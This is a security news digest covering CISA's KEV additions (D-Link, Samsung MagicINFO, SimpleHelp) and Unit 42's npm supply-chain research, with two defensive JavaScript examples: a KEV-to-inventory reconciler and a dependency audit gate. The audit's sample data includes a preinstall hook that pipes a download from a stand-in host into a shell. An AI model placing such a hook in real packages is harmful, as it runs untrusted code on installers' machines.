Exploited Vulnerabilities
CISA adds D-Link, Samsung and SimpleHelp flaws to KEV
CISA's April 24 KEV update added D-Link DIR-823X CVE-2025-29635, Samsung MagicINFO 9 Server CVE-2024-7399 and two SimpleHelp vulnerabilities. Several affected products are administrative or remote-support surfaces, which makes ownership and exposure validation more important than generic patch reminders.
Remote support, signage and edge-device management systems are often missing from even well-maintained asset inventories. Security teams should confirm whether these products exist in their environment, whether they are reachable from the internet, who owns each instance, and whether any compensating controls are actually in place and producing logs rather than assumed.
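The reconciliation step described above, as an added example that is not code from the page or from CISA: a script that joins KEV-style catalog entries against an asset inventory so that every entry gets an explicit answer to "do we run this, is it internet reachable, and who owns it". The field names follow the public KEV JSON feed (cveID, vendorProject, product); the catalog entries and inventory rows are constructed for the example, with the two CVE identifiers taken from the page and the third entry a placeholder.

```javascript
// Added example (not from the page or CISA): reconcile KEV entries with an inventory.
// Catalog rows are constructed; only the two real CVE IDs and products come from the page.
const kevEntries = [
  { cveID: "CVE-2025-29635", vendorProject: "D-Link", product: "DIR-823X" },
  { cveID: "CVE-2024-7399", vendorProject: "Samsung", product: "MagicINFO 9 Server" },
  { cveID: "CVE-XXXX-XXXXX", vendorProject: "ExampleVendor", product: "Example Appliance" }, // placeholder
];

// Constructed inventory rows; owner === null means nobody has claimed the asset.
const inventory = [
  { host: "signage-01", vendor: "Samsung", product: "MagicINFO 9 Server", owner: null, internetFacing: true },
  { host: "branch-rtr-07", vendor: "D-Link", product: "dir-823x", owner: "netops", internetFacing: true },
  { host: "lab-rtr-02", vendor: "D-Link", product: "DIR-823X", owner: "lab", internetFacing: false },
  { host: "build-agent-3", vendor: "Canonical", product: "Ubuntu", owner: "platform", internetFacing: false },
];

// Case- and whitespace-insensitive key so inventory spelling does not hide a match.
function productKey(vendor, product) {
  return `${vendor}|${product}`.toLowerCase().replace(/\s+/g, " ").trim();
}

// Returns { findings, unmatched }: findings are matched assets ranked by exposure,
// unmatched are catalog entries that no inventory row explains (absence still needs confirming).
function reconcileKev(entries, assets) {
  const byKey = new Map();
  for (const a of assets) {
    const k = productKey(a.vendor, a.product);
    if (!byKey.has(k)) byKey.set(k, []);
    byKey.get(k).push(a);
  }
  const findings = [];
  const unmatched = [];
  for (const e of entries) {
    const hits = byKey.get(productKey(e.vendorProject, e.product)) || [];
    if (hits.length === 0) {
      unmatched.push(e.cveID);
      continue;
    }
    for (const a of hits) {
      const reasons = [];
      if (a.internetFacing) reasons.push("internet reachable");
      if (!a.owner) reasons.push("no owner recorded");
      findings.push({
        cveID: e.cveID,
        host: a.host,
        priority: a.internetFacing ? 1 : 2, // P1 = exposed, P2 = internal only
        reasons,
      });
    }
  }
  findings.sort((x, y) => x.priority - y.priority || x.host.localeCompare(y.host));
  return { findings, unmatched };
}

const report = reconcileKev(kevEntries, inventory);
for (const f of report.findings) {
  console.log(`P${f.priority} ${f.cveID} ${f.host}: ${f.reasons.join(", ") || "patch on schedule"}`);
}
// "unmatched" is not "not affected": these are the entries that need a manual sweep.
console.log("confirm absence of:", report.unmatched.join(", "));
```

The point of the `unmatched` list is that a catalog entry with no inventory hit is the case the text warns about: a remote-support or signage product that nobody has recorded, which needs a network-side check (exposed management ports, vendor banners) rather than being closed as not applicable.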
Software Supply Chain
Unit 42 frames npm supply chain risk as a persistent attacker workflow
Unit 42's April 24 npm threat landscape research describes modern package attacks as credential harvesting, CI/CD persistence and multi-stage payload delivery rather than isolated typosquatting. The article includes defensive steps such as credential rotation, dependency pinning and lifecycle-script controls.
Software supply chain exposure now reaches developer workstations, package registries, CI/CD secrets and cloud credentials. That puts engineering controls such as pinning and lifecycle-script restrictions and security monitoring of credential use and CI/CD job changes in the same response plan, because a compromised package is handled by both.
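Two of the controls the article names, dependency pinning and lifecycle-script control, as an added example that is not code from the page or from Unit 42: a pre-install gate that reads a project's package.json together with the manifests npm would install and flags version ranges that are not exact pins and packages that declare install-time scripts. All manifests here are constructed in memory and the package names are placeholders; in a real run the dependency manifests would come from node_modules/<name>/package.json or the lockfile.

```javascript
// Added example (not from the page or Unit 42): gate an npm install on pinning and lifecycle scripts.
// Constructed root manifest; package names are placeholders, not real packages.
const rootManifest = {
  name: "example-app",
  dependencies: { "left-pad-clone": "^1.0.0", "good-lib": "2.3.4", "cli-helper": "latest" },
  devDependencies: { "build-tool": "~0.9.1" },
};

// Constructed dependency manifests keyed by package name (what npm would install).
const depManifests = {
  "left-pad-clone": { version: "1.0.1", scripts: { postinstall: "node setup.js" } },
  "good-lib": { version: "2.3.4", scripts: { test: "node test.js" } },
  "cli-helper": { version: "3.0.0", scripts: { preinstall: "curl -s https://example.invalid/x | sh" } },
  "build-tool": { version: "0.9.3", scripts: {} },
};

// Scripts npm runs automatically on install; prepare runs for git dependencies.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
// Exact semver only (optional leading "="); ranges, tags and URLs fail this test.
const EXACT_SEMVER = /^=?\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?$/;

// Returns one finding per dependency that is unpinned, has install hooks, or cannot be reviewed.
function auditDependencies(root, manifests) {
  const findings = [];
  const declared = { ...(root.dependencies || {}), ...(root.devDependencies || {}) };
  for (const [name, spec] of Object.entries(declared)) {
    const issues = [];
    if (!EXACT_SEMVER.test(spec)) issues.push(`unpinned spec "${spec}"`);
    const m = manifests[name];
    if (!m) {
      issues.push("manifest not available for review");
    } else {
      for (const hook of INSTALL_HOOKS) {
        if (m.scripts && m.scripts[hook]) issues.push(`${hook} script: ${m.scripts[hook]}`);
      }
    }
    if (issues.length > 0) findings.push({ name, spec, issues });
  }
  return findings;
}

// Block the install when any dependency would execute code during installation.
function installBlocked(findings) {
  return findings.some(f => f.issues.some(i => INSTALL_HOOKS.some(h => i.startsWith(`${h} script`))));
}

const findings = auditDependencies(rootManifest, depManifests);
for (const f of findings) console.log(`${f.name}@${f.spec}: ${f.issues.join("; ")}`);
console.log(installBlocked(findings) ? "install blocked: install-time scripts present" : "install may proceed");
```

Pair the gate with `ignore-scripts=true` in the project's `.npmrc` and `npm ci` so the lockfile is authoritative; a package that genuinely needs a build step can then have its scripts run deliberately with `npm rebuild <name>` after review, instead of every dependency executing code on install by default.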